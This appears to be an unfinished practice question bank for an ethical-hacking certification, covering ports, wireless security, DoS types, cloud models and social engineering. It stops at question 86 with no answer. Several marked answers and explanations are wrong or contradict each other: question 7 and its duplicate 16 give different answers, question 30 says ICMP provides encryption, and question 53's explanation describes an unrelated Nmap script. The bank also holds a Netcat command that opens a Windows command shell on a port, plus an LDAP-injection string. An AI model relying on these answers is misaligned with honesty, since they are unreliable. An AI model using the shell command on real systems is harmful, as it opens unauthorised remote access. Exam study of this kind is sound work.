120 QUESTIONS:

-----------------------------------------------------------------------------------
-----------------------------------------------------------------------------------
---------------------

1.What is the default port number for syslog?

514-------------------
69
21
23
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Syslog's default value is 514.
Even if you didn't realize it, the other responses supplied are fairly well-known
default ports (FTP, Telnet, TFTP) that you may use to rule them out as probable
responses.

2.The true statements are which of the following? (Choose two.)

WebGoat is maintained by OWASP. -------------------
WebGoat can be installed on Windows or Linux.-------------------
WebGoat is designed for Apache systems only.
WebGoat is maintained by the IETF.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
WebGoat has 30 or so "lessons" that illustrate how security vulnerabilities work on
a system.
OWASP maintained it which can be installed on almost any platform, works well with
Java and.NET, and provides the ideal “black box” testing environment for both
beginners and experienced pen testers to train on without fear of breaking
something.

3.Which of the following best describes an effort to identify systems that are
critical for the continuation of operation for the organization?
MTD
BCP
BIA-------------------
DRP
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
This description is best matched by the Business Impact Analysis.
Although maximum tolerated downtime is part of the process, and a continuity plan
does address it, a BIA is a real process for identifying those important systems.

4.Enacted in 2002, this U.S. law requires every Federal agency to implement
information security programs, including significant reporting on compliance and
accreditation. What is this law?
FISMA-------------------
OSSTM
NIST 800-53
HIPAA
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
FISMA has been in effect since 2002 and was last revised in 2014.
It delegated certain information security duties to NIST, OMB, and other government
agencies, and appointed the Department of Homeland Security (DHS) as the
operational lead for budgets and security guidelines.

5.Brad has done some research and decided a certain set of systems on his network
fails once every ten years. The purchase price for each of these systems is 1,200.
In addition, Brad finds the administrators on staff, who earn $50 an hour and
estimate five hours to replace a machine. Five employees, earning $25 an hour,
depending on each system and will be completely unproductive while it is down. If
you were to ask Brad for an ALE on these devices, what would he answer?
$207.50-------------------
$2075
$120
$1200
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
ALE = ARO × SLE.
Divide the number of occurrences by the number of years (1 occurrence / 10 years =
0.1) to get ARO.
To calculate SLE, add the purchase price (1200) to the time required to replace
(5*50 = 250) and the amount of lost work (5 hours*5 employees*25 = 625).
In this scenario, the total is $2075. ALE = 0.1*2075, which equals $207.50.

6.Which of the following tools is the best option for rooting the device if you
wish to gain administrative privileges over your Android device?
Pangu
SuperOneClick-------------------
evasi0n7
Cydia
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
SuperOneClick is a rooting tool for Android. The rest are jailbroken iOS options.

7.Providing for integrity in WPA2 is which of the following?

AES-------------------
TKIP
CCMP
RADIUS
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
For integrity, the Counter Mode with Cipher Block Chaining Message Authentication
Code Protocol (say that three times fast) utilizes Message Integrity Codes (MICs).

8.User A is writing a sensitive email message to user B outside the local network.
User A has chosen to use PKI to secure his message and ensure only user B can read
the sensitive email. At what layer of the OSI layer does the encryption and
decryption of the message take place?
A. Application
B. Transport
C. Session
D. Presentation Most Voted
Correct Answer: D
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
The presentation layer or layer 6 of the OSI model is typically responsible for
encryption and decryption
9.Identify the UDP port that Network Time Protocol (NTP) uses as its primary means
of communication?
A. 113
B. 69
C. 123
D. 161
Correct Answer: C

10.In WPA, which secures against man-in-the-middle attacks?

CCMP
AES
MIC-------------------
EAP
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
In WPA, MIC provides integrity checking, ensuring that frames are real and have not
been tampered with.
It does this in part by using a sequence number—if any come out of order, the
entire session is dropped.

11.Choose the action that will provide some protections against the risk security
when some operations promote the use of mobile devices in the enterprise and
security disagrees. Given that multiple risks are associated adding mobile devices
to the network.
Implement MDM.-------------------
Implement WPA.
Add MAC filtering to all WAPs.
Ensure all WAPs are from a single vendor.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Mobile Device Management will not eliminate all of the risks associated with the
ongoing use of mobile devices on your network, but it will help.

12.for performing a bluebugging attack, which of the following is the best choice?
Blooover-------------------
BBProxy
btCrawler
PhoneSnoop
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Blooover is intended to be used for bluebugging.
Blackberry utilities include BBProxy and PhoneSnoop, while btCrawler is a discovery
tool.

13.Which of the following is a true statement regarding his attempt at security in

the situation that you are discussing wireless security with your client who tells
you he feels safe with his network because he has turned off SSID broadcasting?
Unauthorized users will still be able to connect because the SSID is still sent in
all packets, and a sniffer can easily discern the string.-------------------
Unauthorized users will not be able to associate because they must know the SSID in
order to connect.
Unauthorized users will not be able to connect because DHCP is tied to SSID
broadcast.
Unauthorized users will still be able to connect because nonbroadcast SSID puts the
AP in ad hoc mode.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Turning off an SSID's broadcast is a smart first step, but SSIDs have no security
implications.
The SSID is included in every packet, whether broadcast from the AP or not.

14.In WPA, which secures against man-in-the-middle attacks?

CCMP
AES
MIC-------------------
EAP
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
In WPA, MIC provides integrity checking, ensuring that frames are real and have not
been tampered with.
It does this in part by using a sequence number—if any come out of order, the
entire session is dropped.

15.Which jailbreaking methods will keep the phone jailbroken even after it is
rebooted?
Untethered------------------
Rooted
Tethered
Semi-tethered
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
The device remains jailbroken indefinitely, with or without connection to another
device if untethered jailbreaking is being used.

16.Providing for integrity in WPA2 is which of the following?

AES
CCMP-------------------
TKIP
RADIUS
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
For integrity, the Counter Mode with Cipher Block Chaining Message Authentication
Code Protocol (say that three times fast) utilizes Message Integrity Codes (MICs).

17.Which of the following methods is the best way to crack the network key if a
WPA2 wireless network is discovered during a pen test?
Capture a large amount of initialization vectors and crack the key inside.
Use a sniffer to capture the SSID.
WPA2 cannot be cracked.
Capture the WPA2 authentication traffic and crack the key.-------------------
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
WPA2 is a strong encryption method, but with enough time, practically everything
can be hacked.
Capturing the password pairwise master key (PMK) during the handshake is the only
method to achieve it, and even then it's very difficult if the password is complex.

18.The true statement is which of the following?

SSIDs are important for identifying networks but do little to nothing for
security.-------------------
Configuring a strong SSID is a vital step in securing your network.
An SSID should always be more than eight characters in length.
An SSID should never be a dictionary word or anything easily guessed.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
An SSID serves no use other than to identify the network. It is not intended to be
a security measure.

19.For encryption, RC4 is used by which wireless technology?

WAP
WPA2
WEP-------------------
WPA
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
WEP utilizes RC4, which is one of the reasons it is readily hacked and is not
regarded as a secure choice.

20. Temporal keys is made use of by which wireless encryption technology?

WAP
WPA-------------------
WEP
EAP
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
WPA utilizes temporal keys, giving it a far more secure encryption option than WEP.

21. The best describes a teardrop attack is which of the following?

The attacker sends several overlapping, extremely large IP
fragments.-------------------
The attacker sends a packet with the same source and destination address.
The attacker sends UDP Echo packets with a spoofed address.
The attacker uses ICMP broadcast to DoS targets.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
The reassembly of fragments takes down the target in a teardrop attack.

22.Without human interaction, which of the following propagates?

Trojan
MITM
Worm-------------------
Virus
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Worms, like Skynet from the Terminator movies, do not need us.

23.Which does not define a method of data transmission that violates a security
policy in the following?
Session hijacking
Covert channel
Backdoor channel
Overt channel-------------------
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Overt channels are legal and are utilized legally. Everything else on the list is
naughty.

24.How does Tripwire (and similar applications) protect against Trojan attacks?
Tripwire is a file-integrity-checking application that rejects malware packets
intended for the kernel.
Tripwire is a file-integrity-checking application that notifies you when a system
file has been altered, potentially indicating malware.-------------------
Tripwire is an AV application that quarantines and removes malware immediately.
Tripwire is an AV application that quarantines and removes malware after a scan.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Tripwire is a well-known file integrity verification that can assist in the
prevention of Trojans by alerting you instantly when a critical file is altered.

25.Choose the best description of a DRDoS.

Multiple intermediary machines send the attack at the behest of the attacker.
The attacker sends thousands upon thousands of SYN packets to the machine with a
false source IP address.-------------------
The attacker sends thousands of SYN packets to the target but never responds to any
of the return SYN/ACK packets.
The attack involves sending a large number of garbled IP fragments with
overlapping, oversized payloads to the target machine.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
For all intents and purposes, a distributed reflection denial of service (DRDoS)
assault is a botnet.
Secondary systems carry out the attacks, allowing the perpetrator to stay
undetected.

26.Which sequence numbers would the server willingly accept as part of this session
with a window size of 5? During a TCP data exchange, the client provided a sequence
number of 100, while the server provided a sequence number of 500. During
acknowledgments, the packet displays the agreed-upon sequence numbers 101 and 501,
respectively.
102 through 501
Anything above 501
102 through 106-------------------
102 through 502
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
The server will receive packets 102 through 106 before providing an acknowledgment,
which beginning with the acknowledged sequence number 101.

27.When a specific condition is met, which virus type is only executed?

Sparse infector-------------------
Multipartite
Cavity
Metamorphic
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Sparse infector viruses are activated only when a specified condition is satisfied.
When Calculator is launched for the sixth time, whamm - virus execution is the
example,

28.Which is the appropriate syntax for creating a command shell on port 56 using
Netcat on Windows systems?
nc -L 56 -t -e cmd.exe-------------------
nc -r 56 -c cmd.exe
nc -p 56 -o cmd.exe
nc -port 56 -s -o cmd.exe
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
To leave a command shell open on port 56, this is the correct syntax for using
Netcat.

29.For the system or service, which DoS categories consume all available bandwidth?
TCP state-exhaustion attacks
Volumetric attacks-------------------
Fragmentation attacks
Application attacks
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
For the system or service, volumetric attacks consume all available bandwidth.

30.To protect against session hijacking, which of the following is a

recommendation? (Select two answers.)
Use a file verification application, such as Tripwire.
Use only nonroutable protocols.
Implement ICMP throughout the environment.-------------------
Use unpredictable sequence numbers.-------------------
Use a good password policy.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Unpredictable sequence numbers make session hijacking practically difficult, and
integrating ICMP (which provides encryption and authentication services) is
probably also a good idea.

31.In the attack, which doesn’t use ICMP in the following? (select two answers)
Peer to peer-------------------
Smurf
SYN flood-------------------
Ping of Death
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
A SYN flood, like a peer-to-peer attack, does not utilize ICMP at all.

32.To control or mitigate against static electricity in a computer room, which of

the following is not a method used?
A humidity control system
Proper electrical grounding
Anti-static wrist straps
Positive pressure-------------------
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Positive pressure is great for keeping dust and other pollutants out of the room,
but it does little to combat static electricity on its own.
33.Employee background checks, device risk assessments, and key management and
storage rules are all examples of __________ measures in physical security.
operational-------------------
physical
technical
None of the above
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
To enforce a security-minded operation, operational measures are the policies and
procedures you set up.

34.An attacker does a Whois search on a target company and finds the technical
point of contact (POC) and site ownership e-mail addresses. He then composes an e-
mail to the owner from the technical POI, instructing him to visit a link to view
the site's online statistics. Instead, the link takes you to a bogus website where
your credentials are taken.
Spear phishing-------------------
Phishing
Human based
Man in the middle
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Spear phishing happens when an e-mail is delivered to a specified audience, even if
that audience consists of only one individual.
In this case, the attacker used recon data to build an e-mail that was more
realistic to the targeted target and hence more successful.

35.Which social engineering attack is in play in the situation that an attacker

creates a fake ID badge and waits next to an entry door to a secured facility and
an authorized user swipes a key card and opens the door, Jim follows the user
inside?
Phishing
Shoulder surfing
Piggybacking
Tailgating-------------------
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Tailgating occurs when an attacker wears a fraudulent admission badge and follows
an authorized user inside.

36.During a black-box pen test you attempt to pass IRC traffic over port 80/TCP
from a compromised web enabled host. The traffic gets blocked; however, outbound
HTTP traffic is unimpeded. What type of firewall is inspecting outbound traffic?
A. Circuit
B. Stateful
C. Application Most Voted
D. Packet Filtering
Correct Answer: C

37.The following is an SOA record obtained via a zone transfer: What is the name of
the domain's authoritative DNS server, and how frequently will secondary servers
check in for updates?
Hidden @ IN SOA DNSRV1.anycomp.com. postmaster.anycomp.com.
(
4 ; serial number
3600 ; refresh [1h]
600 ; retry [10m]
86400 ; expire [1d]
3600 ) ; min TTL [1h]
DNSRV1.anycomp.com, 3,600 seconds-------------------
postmaster.anycomp.com, 600 seconds
DNSRV1.anycomp.com, 600 seconds
DNSRV1.anycomp.com, 4 seconds
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
The SOA always begins by defining the authoritative server (in this example,
DNSRV1), followed by e-mail contact information along with a few additional items.
The refresh time specifies how frequently secondary servers will check for updates—
in this example, 3,600 seconds (1 hour).

38.Which DNS record allows you to alias both services to the same record (IP
address) if you have an FTP service and an HTTP site on a single server?
NS
CNAME-------------------
PTR
SOA
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
CNAME records are used to create aliases in a zone.

39.Which of the following best describes the role that CSIRT - US Computer Security
Incident Response Team provides?
Vulnerability measurement and assessments for the U.S. Department of Defense.
Pen test registration for public and private sector.
A reliable and consistent point of contact for all incident response services for
associates of the Department of Homeland Security.-------------------
Incident response services for all Internet providers.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
In collaboration with the Department of Homeland Security, CSIRT provides incident
response services to any user, company, agency, or organization.

40.While footprinting a network, you successfully perform a zone transfer. Which

DNS record in the zone transfer indicates the company's e-mail server?
EM
MX-------------------
SOA
PTR
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
MX records define a server as an e-mail server.
An associated A record will define the name-to-IP-address translation for the
server.

41.Which of the following rules are correct for this situation: You are configuring
Snort rules and want an alert message of "Attempted FTP" on any FTP packet
originating from an outside IP and destined for one of your internal hosts.
alert tcp $EXTERNAL_NET any -> $HOME_NET 25 (msg:″Attempted FTP
″)-------------------
alert tcp $EXTERNAL_NET any -> $HOME_NET 21 (msg:″Attempted FTP″)
alert tcp $EXTERNAL_NET any -> $HOME_NET 23 (msg:″Attempted FTP″)
alert tcp $HOME_NET 21 -> $EXTERNAL_NET any (msg:″Attempted FTP″)
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
The syntax for Snort rules is the same: action protocol src address src port ->
dest address port (options).

42.Which Wireshark display filter displays all packets including the term Facebook?
tcp contains facebook-------------------
tcp.all contains ==facebook
display==facebook
content==facebook
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
The following Wireshark display filter is appropriate: The search string is
contained in tcp.

43.Machine A (MAC address 00-01-02-AA-BB-CC) and Machine B (MAC address 00-01-02-

BB-CC-DD) are on the same subnet. Machine C is on a different subnet and has the
address 00-01-02-CCDD-EE. Machine B delivers a communication to Machine C while the
attacker is sniffing on the fully switched network. Which of the following
conditions would be required for an attacker on Machine A to get a copy of this
message?
The ARP cache of Machine A would need to be poisoned, changing the entry for
Machine C to 00-01-02-BB-CC-DD.
The ARP cache of the router would need to be poisoned, changing the entry for
Machine A to 00-01-02-CC-DD-EE.
The ARP cache of Machine B would need to be poisoned, changing the entry for the
default gateway to 00-01-02-AA-BB-CC.-------------------
The ARP cache of Machine C would need to be poisoned, changing the entry for the
default gateway to 00-01-02-AA-BB-CC.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
ARP poisoning is performed on the computer that generates the frame - the sender.
When the sender machine's default gateway entry is changed, all packets destined
for an IP address outside the subnet are routed to the attacker.
It is pointless to change the ARP cache on the other machine or the router.

44.An attacker attached a laptop to a switch port and activated a sniffer. The NIC
is set to promiscuous mode, and the laptop is left alone for a few hours to collect
information.
The packet capture will display all traffic intended for the
laptop.-------------------
The packet capture will provide only the MAC addresses of the laptop and the
default gateway.
The packet capture will provide the MAC addresses of other machines connected to
the switch.-------------------
The packet capture will display all traffic intended for the default gateway.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Switches filter or flood traffic based on the address.
Broadcast traffic, such as ARP requests and answers, is flooded to all ports.
Unicast traffic, such as traffic intended for the laptop itself or the default
gateway, is sent only to the port on which the machine rests.
45.Which of the following is most likely true in the situation that your customer
tells you they understand beyond a doubt an attacker is sending messages back and
forth from their network, yet the IDS doesn’t appear to be alerted on the traffic?
The attacker is sending messages over an SSL tunnel.-------------------
The attacker has configured a trunk port on a switch.
The attacker has corrupted ACLs on every router in the network.
The attacker has set up port security on network switches.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
The bane of IDS’ existence is Encryption.
The IDS is blind as a bat if traffic is encrypted.

46.At Layer 5 of the OSI model, which of the following works?

Circuit-level firewall-------------------
Stateful firewall
Packet-filtering firewall
Application-level firewall
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
This one, I must admit, is difficult.
Yes, circuit-level firewalls function at Layer 5.
Stateful firewalls can be considered to operate at Layer 5, however, their primary
concentration is on Layers 3 and 4.
Layer 7 is where the application operates.

47.Which of the following is the most likely attempting to mitigate against if a

security administrator sets the HttpOnly flag in cookies?
XSS-------------------
CSRF
CSSP
Buffer overflow
SQL injection
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
XSS is the only response that makes sense out of the options created.
This option stops a client-side script from accessing cookies.

48.What can you infer from this username login attempt if a security administrator
monitoring logs comes across a user login attempt that reads UserJoe)(&)?
The attacker is attempting SOAP injection.
The attacker is attempting SQL injection.
The attacker is attempting LDAP injection.-------------------
The attacker is attempting directory traversal.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
The )(&) denotes an attempt at LDAP injection.

49.A business's accounting department detects multiple orders that appear to have
been placed in error. While investigating the issue, you learn that the pricing of
things on various web orders does not appear to match the published pricing on the
public site. You ensure that neither the website nor the ordering database seems to
have been compromised. Furthermore, there were no alarms in the Snort logs
indicating a probable attack on the online application. Which of the following
might explain the current attack?
The attacker has used SQL injection to update the database to reflect new prices
for the items.
The attacker used Metasploit to take control of the web application.
The attacker takes control of the web application.
The attacker has copied the source code to his machine and altered hidden fields to
modify the purchase price of the items.-------------------
The attacker has taken advantage of a server-side include that altered the price.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Because the logs and IDSs reveal no direct attack in this example, the attacker
most likely transferred the source code straight to his computer and changed the
secret "price" fields on the order form. All other forms of attacks would have
readily shown themselves in some shape or other.

50.A true statement is which of the following?

Configuring the web server to send random challenge tokens is the best mitigation
for parameter-manipulation attacks.
Configuring the web server to send random challenge tokens is the best mitigation
for CSRF attacks.-------------------
Configuring the web server to send random challenge tokens is the best mitigation
for buffer overflow attacks.
Configuring the web server to send random challenge tokens is the best mitigation
for XSS attacks.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Requests from the bad guy masquerading as your session ID through your browser may
be greatly reduced by ensuring that each request contains a challenge token - it's
naughty and dropped if the server receives one without a token.

51.If you wanted a lightweight protocol to send real-time data over, which of these
would you use?
TCP
UDP-------------------
ICMP
HTTP
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
TCP uses a three-way handshake, which is fairly heavyweight.
HTTP uses TCP and adds more on top of it.
ICMP is used for control messages.
UDP has very little overhead and is commonly used for real-time data transport.

52.The true regarding n-tier architecture is which of the following?

N-tier allows each tier to be configured and modified
independently.-------------------
N-tier is usually implemented on one server.
N-tier always consists of presentation, logic, and data tiers.
Each tier must communicate openly with every other tier.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
While often built in three tiers, n-tier merely indicates that you have three or
more separately monitored, controlled, and maintained servers, each of which
provides a distinct service or tasking.
53.What is the purpose of a SYN flood? A SYN flood takes advantage of the three-way
handshake. A SYN message alone will consume a connection buffer at the operating
system. Until the operating system has passed the three-way handshake, the request
won’t make it to the webserver at the Application layer. SYN is not a header flag
used with UDP.
Fill up connection buffers at the Application layer
Fill up connection buffers at the operating system-------------------
Fill up connection buffers for UDP
Fill up connection buffers in the webserver
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
The http-methods script examines a target to see whether HTTP methods are available
(by sending an HTTP OPTIONS request).
Why would an attacker do this? You already know the solution to this question if
you know what GET, POST, and PUT does.

54.What best describes a wrapping attack?

A SOAP message is intercepted, data in the envelope is changed, and then the data
is sent/replayed.-------------------
The virtual machine management system on the physical machine is corrupted or
administrative control is gained over it.
CSRF-type attack against cloud computing resources.
An attack involving leveraging a new or existing VM on a physical device against
another VM.
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Wrapping attacks entail interfering with SOAP messages and masquerading them as
legitimate.

55.Internet Protocol Security IPsec is actually a suite pf protocols. Each protocol

within the suite provides different functionality. Collective IPsec does everything
except.
A. Protect the payload and the headers
B. Encrypt
C. Work at the Data Link Layer
D. Authenticate
Correct Answer: C

56.Which of the following best defines this service in the case that Amazon’s EC2
provides virtual machines that can be controlled through a service API?
SaaS
PaaS
Public
IaaS-------------------
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Amazon's EC2 service provides resizable computational capacity in the cloud via VMs
that can be controlled via an API, thereby meeting the definition of IaaS.

57.The cloud computing attacks can be best described as a CSRF attacks is which of
the following?
Session riding-------------------
Side channel
Cross-guest VM breach
Hypervisor attack
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Instead of traditional data centers, session riding is simply CSRF under a
different name and deals with cloud services.

58.Which of the following is the best choice in the security principle that applies
to cloud security if there are many benefits to cloud computing?
Separation of duties-------------------
Need to know
Least privilege
Job rotation
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
While using cloud computing does not entirely resolve the separation of duties, it
is the only option available.
By definition, the cloud may separate the data owner from the data custodian (the
cloud provider assumes the role).

59.Which component acts to manage the use, performance, and delivery of cloud
services, as well as the relationships between providers and subscribers in the
NIST Cloud Computing Reference Architecture?
Cloud consumer
Cloud provider
Cloud broker-------------------
Cloud carrier
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
The broker “serves as an intermediary between the consumer and the provider,
guiding consumers through the complexities of cloud service offerings and perhaps
creating value-added cloud services.”

60.The cloud computing model is geared toward software development is which of the
following?
SaaS
Private
IaaS
PaaS-------------------
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
PaaS is a development platform that allows subscribers to construct apps without
having to establish the infrastructure required to develop and publish software.

61.Which cloud computing model are two examples of Google Docs and Salesforce CRM?
IaaS
PaaS
SaaS-------------------
Public
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Software as a Service best describes this.
SaaS is simply a software distribution model in which the provider provides
subscribers with on-demand applications.

62.Which component acquires and uses cloud products and services in the NIST Cloud
Computing Reference Architecture?
Cloud provider
Cloud carrier
Cloud consumer-------------------
Cloud broker
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
The subscriber is the customer who contracts with a supplier for services.

63.The best represents SOA is which of the following?

An API that allows different components to communicate-------------------
A single database accessed by multiple sources
File server
An application containing both the user interface and the code allowing access to
the data
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
The best available option is Service Oriented Architecture (SOA), which is all
about software components giving information to one another through a network.

64.Which of the following has the responsibility of transmitting the data in the
NIST Cloud Computing Reference Architecture?
Cloud broker
Cloud carrier-------------------
Cloud consumer
Cloud provider
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
The carrier, such as the power distributor for the electric grid, acts as an
intermediary for connectivity and transit between the subscriber and the provider.

65.Which is the best description of the attack being used if an attacker uses a
Metasploit auxiliary exploit to send a series of small messages to a server at
regular intervals and the server responds with 64 bytes of data from its memory?
Heartbleed-------------------
POODLE
FREAK
DROWN
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
Heartbleed utilizes SSL's data-echoing acknowledgment heartbeat.
This technique is vulnerable to OpenSSL versions 1.0.1 through 1.0.1f.

66.An attacker attaches a rogue router in a network. He wants to redirect traffic

to a LAN attached to his router as part of a man-in-the-middle attack. What measure
on behalf of the legitimate admin can mitigate this attack?
A. Make sure that legitimate network routers are configured to run routing
protocols with authentication.
B. Disable all routing protocols and only use static routes
C. Only using OSPFv3 will mitigate this risk.
D. Redirection of the traffic cannot happen unless the admin allows it explicitly.
Correct Answer: A

67.What does the `"oX flag do in an Nmap scan?

A. Perform an eXpress scan
B. Output the results in truncated format to the screen
C. Output the results in XML format to a file
D. Perform an Xmas scan
Correct Answer: C

68.What is the known plaintext attack used against DES which gives the result that
encrypting plaintext with one DES key followed by encrypting it with a second DES
key is no more secure than using a single key?
A. Man-in-the-middle attack
B. Meet-in-the-middle attack
C. Replay attack
D. Traffic analysis attack
Correct Answer: B

69.You need to deploy a new web-based software package for your organization. The
package requires three separate servers and needs to be available on the
Internet. What is the recommended architecture in terms of server placement?
A. All three servers need to be placed internally
B. A web server facing the Internet, an application server on the internal network,
a database server on the internal network
C. A web server and the database server facing the Internet, an application server
on the internal network
D. All three servers need to face the Internet so that they can communicate between
themselves
Correct Answer: B

70.An attacker, using a rogue wireless AP, performed an MITM attack and injected an
HTML code to embed a malicious applet in all HTTP connections. When users accessed
any page, the applet ran and exploited many machines. Which one of the following
tools the hacker probably used to inject HTML code?
A. Wireshark
B. Ettercap
C. Aircrack-ng
D. Tcpdump
Correct Answer: B

71.Which mode of IPSec should you use to assure security and confidentiality of
data within the same LAN?
A. ESP transport mode
B. ESP confidential
C. AH permiscuous
D. AH Tunnel mode
Correct Answer: A

72.Email is transmitted across the Internet using the Simple Mail Transport
Protocol. SMTP does not encrypt email, leaving the information in the message
vulnerable to being read by an unauthorized person. SMTP can upgrade a connection
between two mail servers to use TLS. Email transmitted by SMTP over TLS is
encrypted. What is the name of the command used by SMTP to transmit email over TLS?
A. OPPORTUNISTICTLS
B. UPGRADETLS
C. FORCETLS
D. STARTTLS
Correct Answer: D

73.In the field of cryptanalysis, what is meant by a `rubber-hose` attack?

A. Forcing the targeted keystream through a hardware-accelerated device such as an
ASIC.
B. A backdoor placed into a cryptographic algorithm by its creator.
C. Extraction of cryptographic secrets through coercion or torture.
D. Attempting to decrypt ciphertext by making logical assumptions about the
contents of the original plaintext.
Correct Answer: C

74.Which of the following tools is used to analyze the files produced by several
packet-capture programs such as tcpdump, WinDump, Wireshark, and EtherPeek?
A. tcptrace
B. Nessus
C. OpenVAS
D. tcptraceroute
Correct Answer: A

75.Which of the following Linux commands will resolve a domain name into IP
address?
A. >host-t a hackeddomain.com
B. >host-t ns hackeddomain.com
C. >host -t soa hackeddomain.com
D. >host -t AXFR hackeddomain.com
Correct Answer: A

76.Bob, a network administrator at BigUniversity, realized that some students are

connecting their notebooks in the wired network to have Internet access. In the
university campus, there are many Ethernet ports available for professors and
authorized visitors but not for students. He identified this when the IDS alerted
for malware activities in the network. What should Bob do to avoid this problem?
A. Disable unused ports in the switches
B. Separate students in a different VLAN
C. Use the 802.1x protocol
D. Ask students to use the wireless network
Correct Answer: C
Explanation:-----------------------------------------------------------------------
--------------------------------------------------------------------
A. you cannot disable unused ports because it is mentioned that guests and
professors may use any port to connect, you never know which port they will use.
B. Separate students in a different VLAN - No even if you separate, students will
take their laptop and connect on other switches or ports.
D. Ask students to use the wireless network - You cannot control students by asking
them not to do.

77.An Intrusion Detection System (IDS) has alerted the network administrator to a
possibly malicious sequence of packets sent to a Web server in the network's
external DMZ. The packet traffic was captured by the IDS and saved to a PCAP file.
What type of network tool can be used to determine if these packets are genuinely
malicious or simply a false positive?
A. Protocol analyzer
B. Network sniffer
C. Intrusion Prevention System (IPS)
D. Vulnerability scanner
Correct Answer: A

78.Why should the security analyst disable/remove unnecessary ISAPI filters?

A. To defend against social engineering attacks
B. To defend against webserver attacks
C. To defend against jailbreaking
D. To defend against wireless attacks
Correct Answer: B

79.Which of the following is a component of a risk assessment?

A. Administrative safeguards
B. Physical security
C. DMZ
D. Logical interface
Correct Answer: A

80.Wilson, a professional hacker, targets an organization for financial benefit and

plans to compromise its systems by sending malicious emails. For this purpose, he
uses a tool to track the emails of the target and extracts information such as
sender identities, mail servers, sender IP addresses, and sender locations from
different public sources. He also checks if an email address was leaked using the
haveibeenpwned.com API. Which of the following tools is used by Wilson in the above
scenario?
A. Factiva
B. ZoomInfo
C. Netcraft
D. Infoga
Correct Answer: D

81.Bob, an attacker, has managed to access a target IoT device. He employed an

online tool to gather information related to the model of the IoT device and the
certifications granted to it. Which of the following tools did Bob employ to gather
the above information?
A. FCC ID search Most Voted
B. Google image search
C. search.com
D. EarthExplorer
Correct Answer: A

82.You are a penetration tester working to test the user awareness of the employees
of the client XYZ. You harvested two employees' emails from some public sources and
are creating a client-side backdoor to send it to the employees via email. Which
stage of the cyber kill chain are you at?
A. Reconnaissance
B. Weaponization
C. Command and control
D. Exploitation
Correct Answer: D

83.Sam is working as a system administrator in an organization. He captured the

principal characteristics of a vulnerability and produced a numerical score to
reflect its severity using CVSS v3.0 to properly assess and prioritize the
organization's vulnerability management processes. The base score that Sam obtained
after performing CVSS rating was 4.0. What is the CVSS severity level of the
vulnerability discovered by Sam in the above scenario?
A. Critical
B. Medium
C. High
D. Low
Correct Answer: B

84.SQL injection (SQLi) attacks attempt to inject SQL syntax into web requests,
which may bypass authentication and allow attackers to access and/or modify data
attached to a web application. Which of the following SQLi types leverages a
database server's ability to make DNS requests to pass data to an attacker?
A. In-band SQLi
B. Union-based SQLi
C. Out-of-band SQLi
D. Time-based blind SQLi
Correct Answer: C

85.Which type of virus can change its own code and then cipher itself multiple
times as it replicates?
A. Stealth virus
B. Tunneling virus
C. Cavity virus
D. Encryption virus
Correct Answer: A

86.What is the port to block first in case you are suspicious that an IoT device
has been compromised?
